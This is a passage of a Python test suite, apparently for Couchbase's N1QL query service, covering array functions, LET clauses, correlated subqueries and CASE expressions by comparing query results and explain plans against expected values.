for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_length(array_agg(DISTINCT name)) as num_names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"num_names": len({x["name"] for x in self.full_list
if x["job_title"] == group})}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title, array_length(array_agg(DISTINCT test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['job_title']))
expected_result = [{"job_title": group,
"rates": len({x["test_rate"] for x in self.full_list
if x["job_title"] == group})}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_append(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": sorted(set([x["name"] for x in self.full_list
if x["job_title"] == group] + ['new_name']))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name','123') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": sorted(set([x["name"] for x in self.full_list
if x["job_title"] == group] + ['new_name'] + ['123']))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_prepared_array_append(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
self.prepared_common_body()
def test_array_union_symdiff(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select ARRAY_SORT(ARRAY_UNION(["skill1","skill2","skill2010","skill2011"],skills)) as ' \
'skills_union from {0} order by meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']}]
self.assertTrue(actual_result['results'] == expected_result,
f"{actual_result['results']} not matching with {expected_result}")
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFF(["skill1","skill2","skill2010","skill2011"],skills)) as ' \
'skills_diff1 from {0} order by meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']}])
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFF1(skills,["skill2010","skill2011","skill2012"],' \
'["skills2010","skill2017"])) as skills_diff2 from {0} order by ' \
'meta().id limit 5'.format(query_bucket)
actual_result1 = self.run_cbq_query()
self.assertTrue(
actual_result1['results'] == [{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']}])
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFFN(skills,["skill2010","skill2011","skill2012"],' \
'["skills2010","skill2017"])) as skills_diff3 from {0} order by ' \
'meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017',
'skills2010']}])
def test_let(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select * from %s let x1 = {"name":1} order by meta().id limit 1' % query_bucket
actual_result = self.run_cbq_query()
if "query-testemployee10153.1877827" not in str(actual_result['results']):
self.assertTrue(False, str(actual_result['results']))
self.assertTrue("'x1': {'name': 1}" in str(actual_result['results']))
def test_let_missing(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
created_indexes = []
try:
self.query = 'CREATE INDEX ix1 on %s(x1)' % query_bucket
self.run_cbq_query()
created_indexes.append("ix1")
self.query = 'INSERT INTO %s VALUES ("k01",{"x1":5, "type":"doc", "x2": "abc"}), ' \
'("k02",{"x1":5, "type":"d", "x2": "def"})' % query_bucket
self.run_cbq_query()
self.query = 'EXPLAIN SELECT x1, x2 FROM %s o LET o = CASE WHEN o.type = "doc" THEN o ELSE MISSING ' \
'END WHERE x1 = 5' % query_bucket
try:
self.run_cbq_query(self.query)
except CBQError as ex:
self.assertTrue(str(ex).find("Duplicate variable o (near line 1, column 57) already in scope.") != -1 or
str(ex).find("Duplicate variable o (near line 1, column 66) already in scope.") != -1,
"Error is incorrect.")
else:
self.fail("There was no errors.")
self.query = 'delete from %s use keys["k01","k02"]' % query_bucket
self.run_cbq_query()
finally:
for idx in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (idx, query_bucket, self.index_type)
self.run_cbq_query()
def test_optimized_let(self):
self.fail_if_no_buckets()
self.query = 'explain select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name1 = "employeefi"'
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
for operator in plan['~children'][2]['~child']['~children']:
if operator['#operator'] == 'Filter':
self.assertTrue(operator['condition'] == '(`name1` = "employeefi")' or operator['condition'] == '(substr0((((`d`.`name`)[0]).`FirstName`), 0, 10) = "employeefi")')
if operator['#operator'] == 'Let':
self.assertEqual(operator['bindings'], [{'expr': 'substr0((((`d`.`name`)[0]).`FirstName`), 0, 10)', 'var': 'name1'}])
if operator['#operator'] == 'InitialProject':
self.assertEqual(operator['result_terms'], [{'expr': '`name1`'}])
self.query = 'select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name1 = "employeefi" limit 2'
res = self.run_cbq_query()
self.assertEqual(res['results'], [{'name1': 'employeefi'}, {'name1': 'employeefi'}])
self.query = 'explain select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name[0].MiddleName = "employeefirstname-4"'
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
self.assertEqual(plan['~children'][2]['~child']['~children'],
[{'#operator': 'Filter',
'condition': '((((`d`.`name`)[0]).`MiddleName`) = "employeefirstname-4")'},
{'#operator': 'Let', 'bindings': [
{'var': 'name1', 'expr': 'substr0((((`d`.`name`)[0]).`FirstName`), 0, 10)'}]},
{'#operator': 'InitialProject', 'result_terms': [{'expr': '`name1`'}]}])
self.query = 'select name1 from ' + self.query_buckets[0] + \
' let name1 = substr(name[0].FirstName,0,10) WHERE name[0].MiddleName = "employeefirstname-4" ' \
'limit 10 '
res = self.run_cbq_query()
self.assertTrue(res['results'] == [])
def test_correlated_queries(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
if query_bucket == self.default_bucket_name:
try:
self.query = 'create index ix1 on %s(x,id)' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s (KEY, VALUE) VALUES ' \
'("kk02",{"x":100,"y":101,"z":102,"id":"kk02"})' % query_bucket
self.run_cbq_query()
self.query = 'explain select d.x from {0} d where x in (select raw d.x from {0} b ' \
'use keys ["kk02"])'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x in (select raw d.x from {0} b ' \
'use keys ["kk02"])'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw d.x from {0} ' \
'b use keys[d.id])'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw d.x from {0}' \
' b use keys[d.id])'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b ' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b ' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x' \
' from {0} b use keys["kk02"] ' \
'where b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b use keys["kk02"] ' \
'where b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x,d.id from {0} d where x IN (select raw b.x from {0} b where ' \
'b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x,d.y from {0} d where x IN (select raw b.x from {0} b where b.x ' \
'IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
diffs = DeepDiff(actual_result['results'], [{'y': 101, 'x': 100}], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = 'explain select d.x from {0} d where x IN (select raw (select raw d.x from {0}' \
' c use keys[d.id] where d.x = b.x)[0] from {0} b ' \
'where b.x is not null)'.format(query_bucket)
self.run_cbq_query()
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw (select raw d.x from {0} c ' \
'use keys[d.id] where d.x = b.x)[0] from {0} b where b.x ' \
'is not null)'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select (select raw d.x from ' + self.query_buckets[0] + \
' c use keys[d.id]) as s, d.x from ' + self.query_buckets[0] + \
' d where x is not null'
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
# print plan
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select (select raw d.x from ' + self.query_buckets[0] + \
' c use keys[d.id]) as s, d.x from ' + self.query_buckets[0] + \
' d where x is not null'
actual_result = self.run_cbq_query()
diffs = DeepDiff(actual_result['results'], [{'x': 100, 's': [100]}], ignore_order=True)
self.assertEqual(diffs, {})
finally:
self.query = 'delete from %s use keys["kk02"]' % query_bucket
self.run_cbq_query()
self.query = "DROP INDEX %s ON %s USING %s" % ("ix1", query_bucket, self.index_type)
self.run_cbq_query()
# This test has no uses anywhere
def test_object_concat_remove(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select object_concat({"name":"test"},{"test":123},tasks_points) as obj from %s order by ' \
'meta().id limit 10;' % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == (
[{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}}]))
self.query = 'select OBJECT_REMOVE({"abc":1,"def":2,"fgh":3},"def")'
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'], ([{'$1': {'abc': 1, 'fgh': 3}}]))
def test_array_concat(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_concat(array_agg(name), array_agg(email)) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result1 = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group] +
[x["email"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result1 = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result1, expected_result1)
self.query = "SELECT job_title," + \
" array_concat(array_agg(name), array_agg(email),array_agg(join_day)) as names" + \
" FROM %s GROUP BY job_title limit 10" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group] +
[x["email"] for x in self.full_list
if x["job_title"] == group] +
[x["join_day"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups][0:10]
diffs = DeepDiff(actual_result, expected_result, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
def test_array_prepend(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_prepend(1.2, array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": [x["test_rate"] for x in self.full_list
if x["job_title"] == group] + [1.2]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(1.2,2.4, array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": [x["test_rate"] for x in self.full_list
if x["job_title"] == group] + [1.2] + [2.4]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(['skill5', 'skill8'], array_agg(skills)) as skills_new" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"skills_new": [x["skills"] for x in self.full_list
if x["job_title"] == group] +
[['skill5', 'skill8']]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(['skill5', 'skill8'],['skill9','skill10'], array_agg(skills)) as " + \
" skills_new FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"skills_new": [x["skills"] for x in self.full_list
if x["job_title"] == group] +
[['skill5', 'skill8']] + [['skill9', 'skill10']]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_remove(self):
self.fail_if_no_buckets()
value = 'employee-1'
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_remove(array_agg(DISTINCT name), '%s') as names" % value + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group and x["name"] != value]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
value1 = 'employee-2'
value2 = 'emp-2'
value3 = 'employee-1'
self.query = "SELECT job_title," + \
" array_remove(array_agg(DISTINCT name), '%s','%s','%s') as " % (value1, value2, value3) + \
" names FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group and x["name"] != value1 and x[
"name"] != value3]}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_array_insert(self):
value1 = 'skill-20'
value2 = 'skill-21'
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT array_insert(skills, 1, '%s','%s') " % (value1, value2) + \
" FROM %s limit 1" % query_bucket
actual_list = self.run_cbq_query()
expected_result = [{'$1': ['skill2010', 'skill-20', 'skill-21', 'skill2011']}]
self.assertTrue(actual_list['results'] == expected_result)
def test_array_avg(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_avg(array_agg(test_rate))" + \
" as rates FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
doc['rates'] = round(doc['rates'])
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": round(sum([x["test_rate"] for x in self.full_list
if x["job_title"] == group]) / float(len([x["test_rate"]
for x in self.full_list
if x[
"job_title"] == group])))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_contains(array_agg(name), 'employee-1')" + \
" as emp_job FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": 'employee-1' in [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_array_count(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_count(array_agg(name)) as names" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": len([x["name"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_distinct(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_distinct(array_agg(name)) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
def test_array_max(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_max(array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": max([x["test_rate"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_sum(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, round(array_sum(array_agg(test_rate))) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": round(sum([x["test_rate"] for x in self.full_list
if x["job_title"] == group]))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_min(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_min(array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": min([x["test_rate"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_position(self):
self.query = "select array_position(['support', 'qa'], 'dev') as index_num"
actual_result = self.run_cbq_query()
expected_result = [{"index_num": -1}]
self._verify_results(actual_result['results'], expected_result)
self.query = "select array_position(['support', 'qa'], 'qa') as index_num"
actual_result = self.run_cbq_query()
expected_result = [{"index_num": 1}]
self._verify_results(actual_result['results'], expected_result)
def test_array_put(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-1') as emp_job" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-50','employee-51') as " + \
" emp_job FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group] + ['employee-50'] + [
'employee-51']}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-47') as emp_job" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group] + ['employee-47']}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
def test_array_range(self):
self.query = "select array_range(0,10) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": list(range(10))}]
self._verify_results(actual_result['results'], expected_result)
def test_array_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_replace(array_agg(name), 'employee-1', 'employee-47') as emp_job" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": ["employee-47" if x["name"] == 'employee-1' else x["name"]
for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_repeat(self):
self.query = "select ARRAY_REPEAT(2, 2) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": [2] * 2}]
self._verify_results(actual_result['results'], expected_result)
def test_array_reverse(self):
self.query = "select array_reverse([1,2,3]) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": [3, 2, 1]}]
self._verify_results(actual_result['results'], expected_result)
def test_array_sort(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_sort(array_agg(distinct test_rate)) as emp_job" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["test_rate"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
for item in actual_result['results']:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
# This test has no usages anywhere
def test_poly_length(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_fields = ['tasks_points', 'VMs', 'skills']
for query_field in query_fields:
self.query = "Select length(%s) as custom_num from %s order by custom_num" % (query_field, query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"custom_num": None} for _ in self.full_list]
self._verify_results(actual_result['results'], expected_result)
self.query = "Select poly_length(%s) as custom_num from %s order by custom_num" % (
query_field, query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"custom_num": len(doc[query_field])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['custom_num']))
self._verify_results(actual_result['results'], expected_result)
def test_array_agg(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(name) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# EXPRESSIONS
##############################################################################################
def test_case(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, CASE WHEN join_mo < 3 OR join_mo > 11 THEN 'winter'" + \
" WHEN join_mo < 6 AND join_mo > 2 THEN 'spring' " + \
"WHEN join_mo < 9 AND join_mo > 5 THEN 'summer' " + \
"ELSE 'autumn' END AS period FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name'],
doc['period']))
expected_result = [{"name": doc['name'],
